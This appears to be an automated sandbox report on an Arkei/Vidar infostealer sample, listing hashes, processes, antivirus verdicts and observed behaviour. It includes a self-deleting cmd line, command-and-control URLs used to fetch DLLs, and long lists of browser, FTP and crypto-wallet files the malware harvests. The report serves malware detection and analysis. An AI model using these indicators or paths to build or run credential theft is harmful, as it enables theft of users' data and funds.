- * ID: 1273
- * MalFamily: "Arkei"
- * MalScore: 10.0
- * File Name: "Exes_105f94e56d5fc9fc7555aef13e0af78e.exe"
- * File Size: 722944
- * File Type: "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows"
- * SHA256: "caec69a18e91839c1a46c79c6b55e68e14ba32ec2f2642a375870f958846fc66"
- * MD5: "105f94e56d5fc9fc7555aef13e0af78e"
- * SHA1: "3bc068404a65522272c36b64cceb2adcabb04fb6"
- * SHA512: "4e9136ad3b3b5b4090668ef66e455fc24e5813789a858018022398a84f018f8d7f41573933c3aecda7689926a4d61a1a1494bc5ed81805fb5848757960e777ae"
- * CRC32: "BF36EC09"
- * SSDEEP: "12288:RkOEBVhr1go+yrFYnldnYBxXNRKuEBzhUEVNjHZ7BOXO3v9tq5o:RkOEBaozrFYns6/5/JBOWv9I"
- * Process Execution:
- "8JB5A.exe",
- "8JB5A.exe",
- "cmd.exe",
- "taskkill.exe",
- "services.exe",
- "lsass.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "svchost.exe",
- "taskeng.exe",
- "taskeng.exe",
- "msoia.exe",
- "msoia.exe",
- "taskeng.exe",
- "taskeng.exe",
- "WMIADAP.exe"
- * Executed Commands:
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe\"",
- "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit",
- "C:\\Windows\\System32\\cmd.exe /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit",
- "C:\\Windows\\system32\\lsass.exe",
- "taskkill /im 8JB5A.exe /f",
- "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
- "taskeng.exe 633E54B2-2944-4AC4-90FA-C69D6C08EDCB S-1-5-18:NT AUTHORITY\\System:Service:",
- "taskeng.exe 55EB258C-A9EA-4DA4-A8EF-E736F5A950CE S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
- "taskeng.exe C47FF73B-279F-4D5D-8B65-FD7750272025 S-1-5-18:NT AUTHORITY\\System:Service:",
- "taskeng.exe 67AD5638-AA7B-49DE-8A67-3D392C370D2A S-1-5-18:NT AUTHORITY\\System:Service:",
- "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\"",
- "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload mininterval:2880",
- "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload"
- * Signatures Detected:
- "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
- "Details":
- "Description": "Behavioural detection: Executable code extraction",
- "Details":
- "Description": "Anomalous file deletion behavior detected (10+)",
- "Details":
- "DeletedFile": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1732.26820656"
- "DeletedFile": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1732.26820671"
- "DeletedFile": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1732.26820671"
- "DeletedFile": "C:\\ProgramData\\freebl3.dll"
- "DeletedFile": "C:\\ProgramData\\mozglue.dll"
- "DeletedFile": "C:\\ProgramData\\msvcp140.dll"
- "DeletedFile": "C:\\ProgramData\\nss3.dll"
- "DeletedFile": "C:\\ProgramData\\softokn3.dll"
- "DeletedFile": "C:\\ProgramData\\vcruntime140.dll"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Edge_Cookies.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\IE_Cookies.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\cookie_list.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\information.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\passwords.txt"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\screenshot.jpg"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft\\Authy"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DashCore"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectronCash"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectrumLTC"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Ethereum"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Exodus"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\GoldCoinGLD"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IOCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\JAXX"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MultiDoge"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Zcash"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets"
- "DeletedFile": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\US_00000000-0000-0000-0000-0000000000002566241227.zip"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe"
- "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
- "Description": "Guard pages use detected - possible anti-debugging.",
- "Details":
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "taskeng.exe tried to sleep 481 seconds, actually delayed analysis time by 0 seconds"
- "Process": "WmiPrvSE.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Performs HTTP requests potentially not found in PCAP.",
- "Details":
- "url_ioc": "dersed.com:80//288"
- "url_ioc": "dersed.com:80//freebl3.dll"
- "url_ioc": "dersed.com:80//mozglue.dll"
- "url_ioc": "dersed.com:80//msvcp140.dll"
- "url_ioc": "dersed.com:80//nss3.dll"
- "url_ioc": "dersed.com:80//softokn3.dll"
- "url_ioc": "dersed.com:80//vcruntime140.dll"
- "url_ioc": "ip-api.com:80//line/"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "8JB5A.exe -> C:\\Windows\\System32\\cmd.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
- "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
- "suspicious_request_iocs": "http://dersed.com/288"
- "suspicious_request_iocs": "http://dersed.com/freebl3.dll"
- "suspicious_request_iocs": "http://dersed.com/mozglue.dll"
- "suspicious_request_iocs": "http://dersed.com/msvcp140.dll"
- "suspicious_request_iocs": "http://dersed.com/nss3.dll"
- "suspicious_request_iocs": "http://dersed.com/softokn3.dll"
- "suspicious_request_iocs": "http://dersed.com/vcruntime140.dll"
- "suspicious_request_iocs": "http://ip-api.com/line/"
- "suspicious_request_iocs": "http://dersed.com/"
- "Description": "Performs some HTTP requests",
- "Details":
- "url_iocs": "http://dersed.com/288"
- "url_iocs": "http://dersed.com/freebl3.dll"
- "url_iocs": "http://dersed.com/mozglue.dll"
- "url_iocs": "http://dersed.com/msvcp140.dll"
- "url_iocs": "http://dersed.com/nss3.dll"
- "url_iocs": "http://dersed.com/softokn3.dll"
- "url_iocs": "http://dersed.com/vcruntime140.dll"
- "url_iocs": "http://ip-api.com/line/"
- "url_iocs": "http://dersed.com/"
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details":
- "section": "name: .text, entropy: 7.95, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x000afc00, virtual_size: 0x000afa54"
- "Description": "Uses Windows utilities for basic functionality",
- "Details":
- "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit"
- "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit"
- "command": "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\""
- "Description": "Behavioural detection: Injection (Process Hollowing)",
- "Details":
- "Injection": "8JB5A.exe(1732) -> 8JB5A.exe(2016)"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "8JB5A.exe(1732) -> 8JB5A.exe(2016)"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Behavioural detection: Injection (inter-process)",
- "Details":
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\IE_Cookies.txt"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Edge_Cookies.txt"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Google Chrome_Default.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
- "Description": "Collects information about installed applications",
- "Details":
- "Program": "Google Update Helper"
- "Program": "Microsoft Excel MUI 2013"
- "Program": "Microsoft Outlook MUI 2013"
- "Program": "Google Chrome"
- "Program": "Adobe Flash Player 29 NPAPI"
- "Program": "Adobe Flash Player 29 ActiveX"
- "Program": "Microsoft DCF MUI 2013"
- "Program": "Microsoft Access MUI 2013"
- "Program": "Microsoft Office Proofing Tools 2013 - English"
- "Program": "Adobe Acrobat Reader DC"
- "Program": "Microsoft Office Proofing Tools 2013 - Español"
- "Program": "Microsoft Publisher MUI 2013"
- "Program": "Outils de vérification linguistique 2013 de Microsoft Office - Français"
- "Program": "Microsoft Office Shared MUI 2013"
- "Program": "Microsoft Office OSM MUI 2013"
- "Program": "Microsoft InfoPath MUI 2013"
- "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
- "Program": "Microsoft Word MUI 2013"
- "Program": "Microsoft Groove MUI 2013"
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- "Program": "Microsoft Office OSM UX MUI 2013"
- "Program": "Java Auto Updater"
- "Program": "Microsoft PowerPoint MUI 2013"
- "Program": "Microsoft Office Professional Plus 2013"
- "Program": "Adobe Refresh Manager"
- "Program": "Microsoft Office Proofing 2013"
- "Program": "Microsoft Lync MUI 2013"
- "Program": "Microsoft OneNote MUI 2013"
- "Description": "Stack pivoting was detected when using a critical API",
- "Details":
- "process": "WmiPrvSE.exe:3968"
- "Description": "File has been identified by 37 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "Trojan.GenericKD.32387802"
- "FireEye": "Generic.mg.105f94e56d5fc9fc"
- "McAfee": "RDN/Generic.grp"
- "AegisLab": "Trojan.MSIL.Chapak.4!c"
- "K7AntiVirus": "Trojan ( 005573d61 )"
- "K7GW": "Trojan ( 005573d61 )"
- "Cybereason": "malicious.04a655"
- "Arcabit": "Trojan.Generic.D1EE32DA"
- "Invincea": "heuristic"
- "Symantec": "ML.Attribute.HighConfidence"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "Kaspersky": "HEUR:Trojan.MSIL.Chapak.gen"
- "BitDefender": "Trojan.GenericKD.32387802"
- "Avast": "Win32:Trojan-gen"
- "Ad-Aware": "Trojan.GenericKD.32387802"
- "Sophos": "Mal/Generic-S"
- "DrWeb": "Trojan.Inject3.20236"
- "McAfee-GW-Edition": "BehavesLike.Win32.Generic.bc"
- "Emsisoft": "Trojan.GenericKD.32387802 (B)"
- "SentinelOne": "DFI - Malicious PE"
- "Microsoft": "Trojan:MSIL/CryptInject"
- "Endgame": "malicious (moderate confidence)"
- "ZoneAlarm": "HEUR:Trojan.MSIL.Chapak.gen"
- "GData": "Trojan.GenericKD.32387802"
- "Acronis": "suspicious"
- "MAX": "malware (ai score=100)"
- "Malwarebytes": "Spyware.Vidar"
- "ESET-NOD32": "a variant of Generik.LSRSOXR"
- "Ikarus": "Trojan.SuspectCRC"
- "MaxSecure": "Trojan.Malware.300983.susgen"
- "Fortinet": "MSIL/Malicious_Behavior.VEX"
- "Webroot": "W32.Trojan.Emotet"
- "AVG": "Win32:Trojan-gen"
- "Panda": "Trj/GdSda.A"
- "CrowdStrike": "win/malicious_confidence_100% (W)"
- "Qihoo-360": "Win32/Trojan.973"
- "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
- "Details":
- "Description": "Attempts to access Bitcoin/ALTCoin wallets",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin\\\\x12"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\\\x12"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum\\\n"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\\n"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin\\*.*"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin\\*.*"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko\\*.*"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin\\*.*"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\\n"
- "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
- "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin\\"
- "Description": "Harvests credentials from local FTP client softwares",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
- "Description": "Harvests information related to installed instant messenger clients",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
- "Description": "Uses suspicious command line tools or Windows utilities",
- "Details":
- "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit"
- "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit"
- "command": "taskkill /im 8JB5A.exe /f"
- * Started Service:
- "VaultSvc"
- * Mutexes:
- "Global\\CLR_PerfMon_WrapMutex",
- "Global\\CLR_CASOFF_MUTEX",
- "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963",
- "Global\\ADAP_WMI_ENTRY",
- "Global\\RefreshRA_Mutex",
- "Global\\RefreshRA_Mutex_Lib",
- "Global\\RefreshRA_Mutex_Flag"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\GDIPFONTCACHEV1.DAT",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\passwords.txt",
- "C:\\ProgramData\\freebl3.dll",
- "C:\\ProgramData\\mozglue.dll",
- "C:\\ProgramData\\msvcp140.dll",
- "C:\\ProgramData\\nss3.dll",
- "C:\\ProgramData\\softokn3.dll",
- "C:\\ProgramData\\vcruntime140.dll",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\ld",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\historych",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\c",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\wd",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft\\Authy\\\\xef\\x94\\x98Q\\xc9\\x86",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\IE_Cookies.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Edge_Cookies.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\cookie_list.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\information.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin\\\\x12",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Ethereum\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum\\\n",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectrumLTC\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Exodus\\\n",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Exodus\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectronCash\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MultiDoge\\\n",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Zcash\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DashCore\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin\\",
